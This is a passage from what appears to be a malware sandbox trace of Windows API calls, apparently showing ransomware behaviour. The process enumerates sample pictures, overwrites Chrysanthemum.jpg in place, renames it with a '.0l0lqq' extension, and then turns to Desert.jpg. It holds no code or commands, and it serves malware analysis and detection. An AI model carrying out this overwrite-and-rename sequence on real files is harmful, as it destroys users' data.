hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0246.689] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0246.689] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0246.689] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.691] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22)) returned 1 [0246.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0246.694] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), fInfoLevelId=0x0, lpFileInformation=0x7454bd0 | out: lpFileInformation=0x7454bd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22)) returned 1 [0246.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0246.694] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.694] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.694] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22)) returned 1 [0246.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.694] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.695] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.695] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26d8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26d8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0246.705] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26ddbc | out: lpFileInformation=0x26ddbc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22)) returned 1 [0246.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0246.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0246.705] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), fInfoLevelId=0x0, lpFileInformation=0x7458190 | out: lpFileInformation=0x7458190*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22)) returned 1 [0246.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0246.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26d8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0246.705] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), fInfoLevelId=0x0, lpFileInformation=0x7458288 | out: lpFileInformation=0x7458288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22)) returned 1 [0246.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0246.721] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0246.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0246.835] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0246.836] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x558 [0246.845] GetFileType (hFile=0x558) returned 0x1 [0246.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0246.845] GetFileType (hFile=0x558) returned 0x1 [0246.845] WriteFile (in: hFile=0x558, lpBuffer=0x36a78f0*, nNumberOfBytesToWrite=0xd6b22, lpNumberOfBytesWritten=0x26dd1c, lpOverlapped=0x0 | out: lpBuffer=0x36a78f0*, lpNumberOfBytesWritten=0x26dd1c*=0xd6b22, lpOverlapped=0x0) returned 1 [0246.861] CloseHandle (hObject=0x558) returned 1 [0246.881] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0246.881] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d8a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.0l0lqq", lpFilePart=0x0) returned 0x41 [0246.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0246.881] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), fInfoLevelId=0x0, lpFileInformation=0x26dd80 | out: lpFileInformation=0x26dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6435d910, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22)) returned 1 [0246.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0246.882] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.0l0lqq" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.0l0lqq")) returned 1 [0246.914] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.914] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.914] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.914] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.914] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.914] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.914] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.914] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0246.915] GetFullPathNameW (in: 